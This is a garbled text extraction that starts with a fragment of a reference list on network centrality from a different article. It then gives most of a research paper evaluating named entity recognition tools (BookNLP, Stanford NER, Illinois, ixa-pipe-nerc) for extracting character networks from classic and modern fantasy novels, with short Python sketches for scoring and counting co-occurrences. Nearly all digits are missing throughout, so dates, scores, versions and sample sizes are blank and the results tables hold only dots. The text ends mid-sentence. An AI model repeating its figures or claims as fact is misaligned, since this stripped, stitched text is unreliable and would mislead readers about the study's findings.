c. ( ). residual closeness in net- works. physica, : , – . freeman, l.c. ( ). 
a set of measures of centrality based on betweenness. sociometry, : – . freeman l.c. ( ). centrality in social networks: conceptual clarification. social networks, : – . freeman, l.c. ( ). turning a profit from mathe- matics: the case of social networks. journal of mathematical sociology, : – . freeman, l.c. ( ). the development of social network analysis: a study in the sociology of sci- ence. north charleston, sc: booksurge. freeman, l.c. ( ). the development of social network analysis: with an emphasis on recent events, in sage handbook of social network analysis. john scott and peter carrington, eds. thousand oaks, ca: sage, – . kirk, r.e. ( ). experimental design: procedures for the behavioral sciences. ( rd ed.) pacific grove, ca: brooks/cole. kleinberg, j. . "authoritative sources in a hyper- linked environment." journal of the acm ( ): - . knoke, d., yang, s. ( ). social network analysis. ( nd ed.) los angeles, ca: sage. nieminen, j. ( ). on centrality in a graph. social science research, : – . opsahl, t. ( , march ). closeness centrality in networks with disconnected components. in: tore opsahl. retrieved november , , from http://toreopsahl.com/ / / /closeness- centrality-in-networks-with-disconnected- components/ connections benchmarking and reliability issues | volume | issues & | insna.org otte, e, rousseau, r. ( ). social network analysis: a powerful strategy, also for the information sci- ences. journal of information science, , – . reminga, j., carley, k. ( ). measures for ora (organization risk analyzer*). casos working papers. retrieved november , , from http://www.casos.cs.cmu.edu/publications/papers/r eminga_ _ora.pdf sabidussi, g. ( ). the centrality index of a graph. psychometrika, , – . smith, b.t., boyle, j.m., dongarra, j.j., garbow, b.s., ikebe,y., klema, v., moler, c.b. ( ). matrix eigensystems routines – eispack guide. springer-verlag lecture notes in computer sci- ence, . snowden, d. ( ). from atomism to networks in social systems. the learning organization, ( ), – . stokman, f.n., doreian, p. ( ). evolution of social networks: processes and principles, patrick doreian and frans n. stokman, eds. evolution of social networks. amsterdam: gordon and breach publishers, – . valente, t.w., coronges, k., lakon, c., costenbader, e. ( ). how correlated are network centrality measures? connections, ( ), – . wei, w., pfeffer, j., reminga, j., carley, k. ( ). handling weighted, asymmetric, self-looped and disconnected networks. casos technical report: cmu-isr- - . retrieved november , , from http://www.casos.cs.cmu.edu/publications/papers/ cmu-isr- - .pdf wikipedia ( ). eigenvector centrality. in: central- ity. retrieved november , , from http://en.wikipedia.org/wiki/betweenness#eigenve ctor_centrality. wilkinson, j.h. ( ). the algebraic eigenvalue problem. new york, ny: oxford university press. evaluating named entity recognition tools for extracting social networks from novels evaluating named entity recognition tools for extracting social networks from novels niels dekker , tobias kuhn and marieke van erp department of computer science, vrije universiteit amsterdam, amsterdam, the netherlands dhlab, knaw humanities cluster, amsterdam, the netherlands abstract the analysis of literary works has experienced a surge in computer-assisted processing. to obtain insights into the community structures and social interactions portrayed in novels, the creation of social networks from novels has gained popularity. 
many methods rely on identifying named entities and relations for the construction of these networks, but many of these tools are not specifically created for the literary domain. furthermore, many of the studies on information extraction from literature typically focus on th and early th century source material. because of this, it is unclear if these techniques are as suitable to modern-day literature as they are to those older novels. we present a study in which we evaluate natural language processing tools for the automatic extraction of social networks from novels as well as their network structure. we find that there are no significant differences between old and modern novels but that both are subject to a large amount of variance. furthermore, we identify several issues that complicate named entity recognition in our set of novels and we present methods to remedy these. we see this work as a step in creating more culturally-aware ai systems. subjects computational linguistics, digital libraries, network science and online social networks keywords social networks, named entity recognition, evaluation, digital humanities, classic and modern literature, cultural ai introduction the characters and their relations can be seen as the backbone of any story, and explicitly creating and analysing a network from these relationships can provide insights into the community structures and social interactions portrayed in novels (moretti, ). quantitative approaches to social network analysis to examine the overall structure of these social ties, are borrowed from modern sociology and have found their way into many other research fields such as computer science, history, and literary studies (scott, ). elson, dames & mckeown ( ), lee & yeung ( ), agarwal, kotalwar & rambow ( ), and ardanuy & sporleder ( ) have all proposed methods for automatic social network extraction from literary sources. the most commonly used approach for extracting such networks, is to first identify characters in the novel through named entity recognition (ner) and then identifying relationships between the characters through for example measuring how often two or more characters are mentioned in the same sentence or paragraph. many studies use off-the-shelf named entity recognisers, which are not necessarily optimised for the literary domain and do not take into account the surrounding cultural how to cite this article dekker n, kuhn t, van erp m. . evaluating named entity recognition tools for extracting social networks from novels. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted april published april corresponding author marieke van erp, marieke.van.erp@dh.huc.knaw.nl academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright dekker et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:marieke.�van.�erp@�dh.�huc.�knaw.�nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ context. furthermore, to the best of our knowledge, such studies focus on social network extraction from th and early th century novels (which we refer to as classic novels). typically, these classic novels are obtained from project gutenberg (http://gutenberg.org/), where such public domain books are available for free. 
while beneficial for the accessibility and reproducibility of the studies in question, more recent novels may not imitate these classic novels with respect to structure or style. it is therefore possible that classic novels have social networks that have a structure that is very different from more recent literature. they might differ, for example, in their overall number of characters, in the typical number of social ties any given character has, in the presence or absence of densely connected clusters, or in how closely connected any two characters are on average. moreover, changes along dimensions such as writing style, vocabulary, and sentence length could prove to be either beneficial or detrimental to the performance of natural language processing techniques. this may lead to different results even if the actual network structures remained the same. vala et al. ( ) did compare th and th century novels on the number of characters that appear in the story, but found no significant difference between the two. furthermore, an exploration of extracted networks can also be used to assess the quality of the extracted information and investigate the structure of the expression of social ties in a novel. thus far, we have not found any studies that explore how ner tools perform on a diverse corpus of fiction literature. in this study, we evaluate four different tools on a set of classic novels which have been used for network extraction and analyses in prior work, as well as more recent fiction literature (henceforth referred to as modern novels). we need such an evaluation to assess the robustness of these tools to variation in language over time (biber & finegan, ) and across literary genres. comparing social networks extracted from corpora consisting of classic and modern novels may give us some insights into what characteristics of literary text may aid or hinder automatic social network extraction and provide indications of cultural change. as previous work (ardanuy & sporleder, ) has included works from different genres, in this work we decided to focus on the fantasy/science fiction domain to smooth potential genre differences in our modern books. in our evaluation, we devote extra attention to the comparison between classic and modern fantasy/science fiction in our corpus. we define the following research questions: � to what extent are off-the-shelf ner tools suitable for identifying fictional characters in novels? � which differences or similarities can be discovered between social networks extracted for different novels? to answer our first research question, we first evaluate four named entity recognisers on classic and modern fantasy/science fiction novels. in each of these novels, the first chapter is manually annotated with named entities and coreference relations. the named entity recognisers we evaluate are: ( ) booknlp (bamman, underwood & smith, ; we follow (sainte-beuve, ) here in defining a classic novel not as one written by the ancient greeks or romans (‘the classics’) but to canonical works. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://gutenberg.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ https://github.com/dbamman/book-nlp—commit: d a ) which is specifically tailored to identify and cluster literary characters, and has been used to extract entities from a corpus of , english novels. at the time of writing, this tool was cited times. ( ) stanford ner version . . 
(finkel, grenager & manning, ), one of the most popular named entity recognisers in the nlp research community, cited , times at the time of writing. ( ) illinois named entity tagger version . . (ratinov & roth, ), a computationally efficient tagger that uses a combination of machine learning, gazetteers, and additional features extracted from unlabelled data. at the time of writing, the system was downloaded over , times. our last system ( ) is ixa-pipe-nerc version . . (agerri & rigau, ), a competitive classifier that employs unlabelled data via clustering and gazetteers that outperformed other state-of-the-art ner tools on their within and out-domain evaluations. to answer the second research question, we use the recognised named entities to create a co-occurrence network for each novel. network analysis measures are then employed to compare the extracted networks from the classic and modern novels to investigate whether the networks from the different sets of novels exhibit major differences. the contributions of this paper are: ( ) a comparison and an analysis of four ner on classic and modern novels; ( ) a comparison and an analysis of social network analysis measures on networks automatically extracted from classic and modern novels; ( ) experiments and recommendations for boosting performance on recognising entities in novels; and ( ) an annotated gold standard dataset with entities and coreferences of classic and modern novels. the remainder of this paper is organised as follows. we first discuss related work in the section ‘related work’. next, we describe our approach and methods in the section ‘materials and data preparation’. we present our evaluation of four different ner systems on classic and modern novels in the section ‘named entity recognition experiments and results’, followed by the creation and analysis of social networks in the section ‘network analysis’. we discuss issues that we encountered in the identification of fictional characters and showcase some methods to boost performance in the section ‘discussion and performance boosting options’. we conclude by suggesting directions for future work in the section ‘conclusion and future work’. the code for all experiments as well as annotated data can be found at https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel. related work as mentioned in the section ‘introduction’, we have not found any other studies that compared the performances of social network extraction on classic and modern novels; or compared the structures of these networks. this section therefore focuses on the techniques used on classic literature. in first part of this section, we will describe how other studies extract and cluster characters. in the second part, we outline what different choices can be made for the creation of a network, and motivate our choices for this study. a gazetteer is a list of names dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dbamman/book-nlp https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ named entity recognition the first and foremost challenge in creating a social network of literary characters is identifying the characters. ner is often used to identify passages in text that identify things by a name. furthermore, identified passages are often also classified into various categories such as person, location, and organisation. 
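as a concrete illustration of what such off-the-shelf tagging produces, the sketch below runs a generic recogniser over a single sentence; spacy is used here only because it is compact to show, and it is not one of the four systems evaluated in this study:

```python
import spacy

# requires the small english model: python -m spacy download en_core_web_sm
nlp = spacy.load("en_core_web_sm")

sentence = ("Mr. Sherlock Holmes, who was usually very late in the mornings, "
            "sat at the breakfast table in Baker Street, London.")
doc = nlp(sentence)
for ent in doc.ents:
    print(ent.text, ent.label_)        # labels such as PERSON, GPE, ORG, ...
# for character-network extraction, only the person spans are usually kept
```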
typically, this approach is also used to identify miscellaneous numerical mentions such as dates, times, monetary values, and percentages. elson, dames & mckeown ( ), ardanuy & sporleder ( ), bamman, underwood & smith ( ), and vala et al. ( ) all use the stanford ner tagger (finkel, grenager & manning, ) to identify characters in literary fiction. on a collection of sherlock holmes novels, these studies perform named entity recognition, f -scores between: and . vala et al. ( ) propose that the main difficulty with this collection is the multitude of minor characters, a problem which we expect to be also present in our collections of classic and modern novels. a big difference between the news domain (for which most language technology tools have been created) and the literary domain, is that names do not have to follow the same ‘rules’ as names in the real world. this topic is explored in the namescape project by de does et al. ( ) namescape (http://blog.namescape.nl/). in this project, one million tokens taken from dutch novels were manually annotated. a distinction between first and last names was made in order to test whether different name parts are used with different effects. a named entity recogniser was trained specifically for this corpus by namescape-clin, obtaining an f score of . for persons. the corpus contains fragments of novels written between the th and th century, but as the corpus and tools are not available, we cannot investigate its depth or compare it directly to our work. other approaches attempt to use the identification of locations and physical proximity to improve the creation of a social network (lee & yeung, ). coreference resolution one difficulty of character detection is the variety of aliases one character might go by, or; coreference resolution. for example, george martin’s tyrion lannister, might alternatively be mentioned as ser tyrion lannister, lord tyrion, tyrion, the imp or the halfman. in the vast majority of cases, it is desirable to collapse those character references into one character entity. however, in some cases, retaining some distinction between character references can be useful: we provide an example of this in subsection ‘network exploration’. two distinct approaches attempt to address this difficulty, ( ) omit parts of a multi- word name, or ( ) compile a list of aliases. the former approach leaves out honorifics such as the ser and lord in the above example in order to cluster the names of one character. to automate this clustering step, some work has been done by bamman, underwood & smith ( ) and ardanuy & sporleder ( ). while useful, the former approach alone provides no solace for the matching of the last two example aliases; where no part of the character’s name is present. the latter approach thus suggests to manually compile a list of aliases for each character with the aid of external resources or annotators. this method is utilised by elson, dames & mckeown ( ) and dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://blog.namescape.nl/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee & yeung ( ). in namescape-clin, wikification (i.e. attempting to match recognised names to wikipedia resources) is used. obviously this is most useful for characters that are famous enough to have a wikipedia page. the authors state in their error analysis van dalen-oskam et al. ( , section . 
) that titles that are most likely from the fantasy domain are most difficult to resolve, which already hints at some differences between names in different genres. anaphora resolution to identify as many character references as possible, it is important to take into account that not all references to a character actually mention the character’s name. in fact, bamman, underwood & smith ( ) show that % of character references come in the form of a pronouns such as he, him, his, she, her, and hers in a collection of , english novels. to capture these references, the anaphoric pronoun is typically matched to its antecedent by using the linear word distance between the two, and by matching the gender of anaphora to that of the antecedent. the linear word distance can be, for example, the number of words between the pronoun and the nearest characters. for unusual names, as often found in science fiction and fantasy, identification of the gender may be problematic. network creation for a social network of literary characters, characters are represented by the nodes, whereas the edges indicate to some interaction or relationship. while the definition of a character is uniformly accepted in the literature, the definition of an interaction varies per approach. in previous research, two main approaches can be identified to define such an edge. on the one hand, conversational networks are used in approaches by chambers & jurafsky ( ), elson & mckeown ( ), and he, barbosa & kondrak ( ). this approach focuses on the identification of speakers and listeners, and connecting each speaker and listener to the quoted piece of dialogue they utter or receive. on the other hand, co-occurrence networks (as used by ardanuy & sporleder ( ) and fernandez, peterson & ulmer ( )) are created by connecting characters if they occur in the same body of text. while conversational networks can provide a good view of who speaks directly to whom, ardanuy & sporleder ( ) argue that ‘...much of the interaction in novels is done off-dialogue through the description of the narrator or indirect interactions’ (p. ). what value to assign to the edges depends on the end-goal of the study. for example, fernandez, peterson & ulmer ( ) assign a negative or positive sentiment score to the edges between each character-pair in order to ultimately predict the protagonist and antagonist of the text. ardanuy & sporleder ( ) used weighted edges to indicate how often two characters interact. network analysis social network analysis draws upon network theory for its network analysis measures (scott, ). the application of these measures to networks extracted from literature has been demonstrated insightful in assessing the relationships of characters in for example dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ‘alice in wonderland’ (agarwal et al., ) and ‘beowulf’, the ‘iliad’ and ‘táin bó cuailnge’ (‘the cattle raid of cooley’, an irish epic) (mac carron & kenna, ). network analysis can also play a role in authorship attribution (amancio, , akimushkin, amancio & oliveira, ) and characterising a novel (elson, dames & mckeown, ). materials and data preparation for the study presented here, we are interested in the recognition and identification of persons mentioned in classic and modern novels for the construction of the social network of these fictitious characters. 
we use off-the-shelf state-of-the-art entity recognition tools in an automatic pipeline without manually created alias lists or similar techniques. for the network construction, we follow ardanuy & sporleder ( ) and apply their co-occurrence approach for the generation of the social network links with weighted edges that indicate how often two characters are mentioned together. we leave the consideration of negative weights and sentiments for future work. before we will explain the details of the used entity recognition tools, how they compare for the given task, and how their results can be used to build and analyse the respective social networks, we explain first the details of our selected corpus, how we preprocessed the data, and how we collected the annotations for the evaluation. corpus selection our dataset consists of novels— classic and modern novels—the specifics of which are presented in table a in the appendix. any selection of sources is bound to be unrepresentative in terms of some characteristics but we have attempted to balance breadth and depth in our dataset. furthermore, we have based ourselves on selections made by other researchers for the classics and compilations by others for the modern books. for the classic set, the selection was based on guardian’s top all-time classic novels (mccrum, ). wherever possible, we selected books that were ( ) analysed in related work (as mentioned in the subsection ‘coreference resolution’) and ( ) available through project gutenberg (https://www.gutenberg.org/). for the modern set, the books were selected by reference to a list compiled by bestfantasybookscom (http://bestfantasybooks.com/top -fantasy-books.php, last retrieved: october ). for our final selection of these novels, we deliberately made some adjustments to get a wider selection. that is, some of the books in this list are part of a series. if we were to include all the books of the upvoted series, our list would consist of only four different series. we therefore chose to include only the first book of each of such series. as the newer books are unavailable on gutenberg, these were purchased online. these digital texts are generally provided in .epub or .mobi format. in order to reliably convert these files into plain text format, we used calibre (https://calibre-ebook.com/—version . ), a free and open-source e-book conversion tool. this conversion was mostly without any hurdles, but some issues were encountered in terms of encoding, as is discussed in the next section. due to copyright restrictions, we cannot share this full dataset but our gold standard dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.gutenberg.org/ http://bestfantasybooks.com/top -fantasy-books.php https://calibre-ebook.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ annotations of the first chapter of each are provided on this project’s github page. the isbn numbers of the editions used in our study can be found in table a the appendix. data preprocessing to ensure that all the harvested text files were ready for processing, we firstly ensured that the encoding for all the documents was the same, in order to avoid issues down the line. in addition, all information that is not directly relevant to the story of the novel was stripped. even while peripheral information in some books—such as appendices or glossaries—can provide useful information about character relationships, we decided to focus on the story content and thus discard this information. 
where applicable, the following peripheral information was manually removed: ( ) reviews by fellow writers, ( ) dedications or acknowledgements, ( ) publishing information, ( ) table of contents, ( ) chapter headings and page numbers, and ( ) appendices and/or glossaries. during this clean-up phase, we encountered some encoding issues that came with the conversion to plain text files. especially in the modern novels, some novels used inconsistent or odd quotation marks. this issue was addressed by replacing the inconsistent quotation marks with neutral quotations that are identical in form, regardless of whether if it is used as opening or closing quotation mark. annotation because of limitations in time and scope, we only annotated approximately one chapter of each novel. in this subsection, we describe the annotation process. annotation data to evaluate the performance for each novel, a gold standard was created manually. two annotators (not the authors of this article) were asked to evaluate books from each category. for each document, approximately one chapter was annotated with entity co-occurrences. because the length of the first chapter fluctuated between and , sentences, we selected an average of sentences for each book that was close to a chapter-boundary. for example, for alice in wonderland, the third chapter ended on the th sentence, so the first three chapters were extracted for annotation. while not perfect, we attempted to strike a balance between comparable annotation lengths for each book, without cutting off mid-chapter. annotation instructions for each document, the annotators were asked to annotate each sentence for the occurrence of characters. that is, for each sentence, identify all the characters in it. to describe this process, an example containing a single sentence from a game of thrones is included in table . the id of the sentence is later used to match the annotated sentence to table annotation example. id preceding context focus sentence subsequent context # person person bran reached out hesitantly ‘go on’, robb told him ‘you can touch him’ robb stark bran stark dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ its system-generated counterpart for performance evaluation. the focus sentence is the sentence that corresponds to this id, and is the sentence for which the annotator is supposed to identify all characters. as context, the annotators are provided with the preceding and subsequent sentences. in this example, the contextual sentences could be used to resolve the ‘him’ in the focus sentence to ‘bran’. to indicate how many persons are present, the annotators were asked to fill in the corresponding number (#) of people—with a maximum of characters per sentence. depending on this number of people identified, subsequent fields became available to the annotator to fill in the character names. to speed up the annotation, an initial list of characters was created by applying the booknlp pipeline to each novel. the annotators were instructed to map the characters in the text to the provided list to the best of their ability. if the annotator assessed that a person appears in a sentence, but is unsure of this character’s identity, the annotators would mark this character as default. in addition, the annotators were encouraged to add characters, should they be certain that this character does not appear in the pre-compiled list, but occurs in the text nonetheless. 
such characters were given a specific tag to ensure that we could retrieve them later for analysis. lastly, if the annotator is under the impression that two characters in the list refer to the same person, the annotators were instructed to pick one and stick to that. lastly, the annotators were provided with the peripheral annotation instructions found in table . while this identification process did include anaphora resolution of singular pronouns— such as resolving ‘him’ to ‘bran’—the annotators were instructed to ignore plural pronoun references. plural pronoun resolution remains a difficult topic in the creation of social networks, as family members may sometimes be mentioned individually, and sometimes their family as a whole. identifying group membership, and modelling that in the social network structure is not covered by any of the tools we include in our analysis or the related work referenced in the section ‘related work’ and therefore left to future work. named entity recognition experiments and results we evaluate the performance of four different ner systems on the annotated novels: booknlp (bamman, underwood & smith, ), stanford ner (finkel, grenager & manning, ), illinois tagger (ratinov & roth, ), and ixa-pipe-nerc (agerri & rigau, ). the booknlp pipeline uses the - - release of stanford ner tagger (finkel, grenager & manning, ) internally with the seven-class ontonotes model. table annotation instructions. guideline example ignore generic pronouns ‘everyone knows; you don’t mess with me!’ ignore exclamations ‘for christ’s sake!’ ignore generic noun phrases ‘bilbo didn’t know what to tell the wizard’ include non-human named characters ‘his name is buckbeak, he’s a hippogriph’ note: boldface indicates an entity mention. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as there have been several releases, and we focus on entities of type person, we also evaluate the - - stanford ner four-class conll model. the results of the different ner systems are presented in table for the classic novels, and table for the modern novels. all results are computed using the evaluation script used in the conll and ner campaigns using the phrase-based evaluation setup (https://www.clips.uantwerpen.be/conll /ner/bin/conlleval.txt, last retrieved: october ). the systems are evaluated according to micro-averaged precision, recall and f measure. precision is the percentage of named entities found by the system that were correct. recall is the percentage of named entities present in the text that are retrieved by the system. the f measure is the harmonic mean of the precision and recall scores. in a phrase-based evaluation setup, the system only scores a point if the complete entity is correctly identified, thus if in a named entity consisting of multiple tokens only two out of three tokens are correctly identified, the system does not obtain any points. the booknlp and ixa-pipe-nerc systems require that part of speech tagging is performed prior to ner, we use the modules included in the respective systems table precision (p), recall (r), and f -scores of different ner systems on classic novels. title booknlp stanford ner illinois ner ixa-nerc p r f p r f p r f p r f . . . . . . . . . . . . a study in scarlet⊙ . . . . . . . . . . . . alice in wonderland . . . . . . . . . . . . brave new world . . . . . . . . . . . . david copperfield⊙ . . . . . . . . . . . . dracula⊙ . . . . . . . . . . . . emma . . . . . . . . . . . . 
frankenstein⊙ . . . . . . . . . . . . huckleberry finn . . . . . . . . . . . . dr. jekyll and mr. hyde . . . . . . . . . . . . moby dick⊙ . . . . . . . . . . . . oliver twist . . . . . . . . . . . . pride and prejudice . . . . . . . . . . . . the call of the wild . . . . . . . . . . . . the count of monte cristo . . . . . . . . . . . . the fellowship of the ring . . . . . . . . . . . . the three musketeers . . . . . . . . . . . . the way we live now . . . . . . . . . . . . ulysses . . . . . . . . . . . . vanity fair . . . . . . . . . . . . mean m . . . . . . . . . . . . standard deviation s . . . . . . . . . . . . note: the highest scores in each column are highlighted in bold, and the lowest scores in italics. novels written in st person are marked with ⊙. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.clips.uantwerpen.be/conll /ner/bin/conlleval.txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for this. for stanford ner and illinois ne tagger plain text is offered to the ner systems. as the standard deviations on the bottom rows of tables and indicate, the results on the different books vary greatly. however, the different ner systems generally do perform similarly on the same novels, indicating that difficulties in recognising named entities in particular books is a characteristic of the novels rather than the systems. an exception is brave new world on which booknlp performs quite well, but the others underperform. upon inspection, we find that the annotated chapter of this book contains only five different characters among which ‘the director’ which occurs times. this entity is consistently missed by the systems resulting in a high penalty. furthermore, the ‘mr.’ in ‘mr. foster’ (occurring times) is often not recognised as in some ne models titles are excluded. a token-based evaluation of illinois ne tagger on this novel for example yields a f -score of . . the same issue is at hand with dr. jekyll and mr. hyde and dracula. although the main ner module in booknlp is driven by stanford ner, we suspect that additional domain adaptations in this package account for this performance difference. table precision (p), recall (r), and f scores of different ner systems on modern novels. title booknlp stanford ner illinois ner ixa-nerc p r f p r f p r f p r f a game of thrones . . . . . . . . . . . . assassin’s apprentice⊙ . . . . . . . . . . . . elantris . . . . . . . . . . . . gardens of the moon . . . . . . . . . . . . harry potter . . . . . . . . . . . . magician . . . . . . . . . . . . mistborn . . . . . . . . . . . . prince of thorns . . . . . . . . . . . . storm front⊙ . . . . . . . . . . . . the black company⊙ . . . . . . . . . . . . the black prism . . . . . . . . . . . . the blade itself . . . . . . . . . . . . the colour of magic . . . . . . . . . . . . the gunslinger . . . . . . . . . . . . the lies of locke lamora . . . . . . . . . . . . the name of the wind . . . . . . . . . . . . the painted man . . . . . . . . . . . . the way of kings . . . . . . . . . . . . the wheel of time . . . . . . . . . . . . way of shadows . . . . . . . . . . . . mean m . . . . . . . . . . . . standard deviation s . . . . . . . . . . . . note: the highest scores in each column are highlighted in bold, and the lowest scores in italics. novels written in st person are marked with ⊙. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
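to make the phrase-based scoring concrete, the sketch below shows how micro-averaged precision, recall and f can be computed once gold and system entities are represented as exact (sentence id, start token, end token) spans; the function name and the toy spans are illustrative and not part of the conlleval script itself.

```python
def phrase_prf(gold_spans, pred_spans):
    """micro-averaged phrase-based precision, recall and f-measure.

    both arguments are sets of (sentence_id, start, end) tuples; a predicted
    entity only counts as correct if the complete span matches a gold span
    exactly, mirroring the conll-style phrase-based setup described above.
    """
    correct = len(gold_spans & pred_spans)
    precision = correct / len(pred_spans) if pred_spans else 0.0
    recall = correct / len(gold_spans) if gold_spans else 0.0
    f_measure = (2 * precision * recall / (precision + recall)
                 if precision + recall else 0.0)
    return precision, recall, f_measure


# toy example: the second gold entity is only partially recovered, so it scores nothing
gold = {(0, 2, 4), (1, 0, 3)}
pred = {(0, 2, 4), (1, 0, 2)}
print(phrase_prf(gold, pred))  # (0.5, 0.5, 0.5)
```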
https://peerj.com/computer-science/ when comparing the f -scores of the st person novels to the rd person novels in tables and , we find that the st person novels perform significantly worse than their rd person counterparts, at p < . . these findings are in line with the findings of elson, dames & mckeown ( ). in the section ‘discussion and performance boosting options’, we delve further into particular difficulties that fiction presents ner with and showcase solutions that do not require retraining the entity models. as the booknlp pipeline in the majority of the cases outperforms the other systems and includes coreference resolution and character clustering, we further utilise this system to create our networks. the results of the booknlp pipeline including the coreference and clustering are presented in table a . one of the main differences in that table is that if popular entities are not recognised by the system they are penalised heavier because the coreferent mentions are also not recognised and linked to the correct entities. this results in scores that are generally somewhat lower, but the task that is measured is also more complex. network analysis in this section, we explain how the networks were created using the recognised named entities (subsection ‘network construction’), followed by an explanation of network analysis measures that we applied to compare the networks (subsection ‘network features’). we discuss the results of the analysis (subsection ‘results of network analysis’), as well as present an exploration of the network of one novel in particular to illustrate how a visualisation of a network can highlight particular characteristics of the interactions in the selected novel (subsection ‘network exploration’). network construction as explained in the section ‘related work’, we opt for the co-occurrence rather than the conversational method for finding the edges of our networks. the body of text that is used to define a co-occurrence differs per approach. whereas fernandez, peterson & ulmer ( ) define such a relation if characters are mentioned in the same sentence, ardanuy & sporleder ( ) use a paragraph for the same definition. we consider the delineation of what constitutes a paragraph to be too vague for the purpose of this study. while paragraphs are arguably better at conveying who interacts with whom, simply because of their increased length, it also brings forth an extra complexity in terms of their definition. traditionally, paragraphs would be separated from another by means of a newline followed by an indented first line of the next paragraph. while this format holds for a part of our collection, it is not uniform. other paragraph formats simply add vertical white space, or depend solely on the content (bringhurst, ). especially because the text files in our approach originate from different online sources— each with their own accepted format—we decided that the added ambiguity should be avoided. for this study, we therefore define that a co-occurrence relationship between two characters exists if they are mentioned in the same sentence. for a co-occurrence of more than two characters, we follow elson, dames & mckeown ( ). dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that is, a multi-way co-occurrence between four characters is broken down into six bilateral co-occurrences. 
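a minimal sketch of this sentence-level co-occurrence extraction (the helper name is hypothetical; we assume mentions have already been resolved to one canonical character name per sentence):

```python
from collections import Counter
from itertools import combinations


def cooccurrence_edges(sentences):
    """turn per-sentence character lists into weighted co-occurrence edges.

    `sentences` is a list of lists, one list of canonical character names per
    sentence. a multi-way co-occurrence is broken down into all bilateral
    pairs (four characters in one sentence yield six pairs), and each edge
    weight counts how often the two characters are mentioned together.
    """
    edge_weights = Counter()
    for characters in sentences:
        for a, b in combinations(sorted(set(characters)), 2):
            edge_weights[(a, b)] += 1
    return edge_weights


# toy example with three sentences
sentences = [["robb", "bran"], ["bran", "jon", "ned", "robb"], ["dany"]]
print(cooccurrence_edges(sentences))
# Counter({('bran', 'robb'): 2, ('bran', 'jon'): 1, ('bran', 'ned'): 1, ...})
```

feeding these weighted pair counts into a graph library then yields the network described in the next subsection.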
for the construction of each social network, the co-occurrences are translated to nodes for characters and edges for relationships between the characters. we thus create a static, undirected and weighted graph. for the weight of each edge, we follow ardanuy & sporleder ( ). that is, each edge is assigned a weight depending on the number of interactions between two characters. for the construction of the network, we used networkx (https://networkx.github.io/—v . ) and gephi (https://gephi.org/—v . . ) to visualise the networks. to ground the network analysis to be presented below, we gathered some overall statistics of the network creation process shown in table a on page . as mentioned in the subsection ‘annotation’, if the annotator decided that a character was definitely present, but unable to assert which character, the occurrence was marked as default. the fraction of defaults represents what portion of all identified characters was marked with default. the fraction of unidentified characters represents the percentage of characters that were not retrieved by the system, but had to be added by the annotators. next, we present some overall statistics such as sentence length, the average number of persons in a sentence, and the average fraction of sentences that mention a person. lastly, we kept track of the total number of annotated sentences, the total number of unique characters and character mentions. the only difference that could be identified between classes is the average sentence length, which was significant at p < . . the sentences in classic books are significantly longer than in modern novels, suggesting that there is indeed some difference in writing style. however, other than that, none of the other measures differ significantly. this is useful information, as it helps support that the novels used in either class are comparable, despite their age-gap. network features we analyse the following eight network features: ( ) average degree is the mean degree of all the nodes in the network. the degree of a node is defined as the number of other nodes the node is connected to. if the degree of a node is zero, the node is connected to no other nodes. the degree of a node in a social network is thus is measure of its social ‘activity’ (wasserman & faust, ). a high value—for example, in ulysses—indicates that the characters interact with many different other characters. contrarily, a low value—for example, in —indicates that the characters only interact with a small number of other characters. ( ) average weighted degree is fairly similar to the average degree, but especially in the sense of social networks, a distinction must be made. it differs in the sense that the weighted degree takes into account the weight of each of the connecting edges. whereas a character in our social network could have a high degree—indicating a high level of social activity—if the weights of all those connected edges are relatively small, this suggests only superficial contact. conversely, while the degree of a character could be low—for example, the character is only connected to two other characters— the two edges could have very large weights, indicating a deep social connection dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://networkx.github.io/ https://gephi.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between the characters. newman ( ) underlines the importance of this distinction in his work on scientific collaborations. 
to continue the examples of ulysses and ; while their average degrees are vastly different (with ulysses being the highest of its class and the lowest), their average weighted degrees are comparable. ( ) average path length is the mean of all the possible shortest paths between each node in the network; also known as the geodesic distance. if there is no path connecting two nodes, this distance is infinite and the two nodes are part of different graph components (see item , connected components). the shortest path between two nodes can be found by using dijkstra’s algorithm (dijkstra, ). the path length is typically an indication of how efficiently information is relayed through the network. a network with a low path length would indicate that the people in the network can reach each other through a relatively small number of steps. ( ) network diameter is the longest possible distance between two nodes in the network. it is in essence the longest, shortest path that can be found between any two nodes in the network, and is indicative of the linear size of the network (wasserman & faust, ). ( ) graph density is the fraction of edges compared to the total number of possible edges. it thus indicates how complete the network is, where completeness would constitute all nodes being directly connected by an edge. this is often used in social network analysis to represent how closely the participants of the network are connected (scott, ). ( ) modularity is used to represent community structure. the modularity of a network is ‘...the number of edges falling within groups minus the expected number in an equivalent network with edges placed at random’ (newman, ). newman shows modularity can be used as an optimisation metric to approximate the number of community structures found in the network. to identify the community structures, we used the 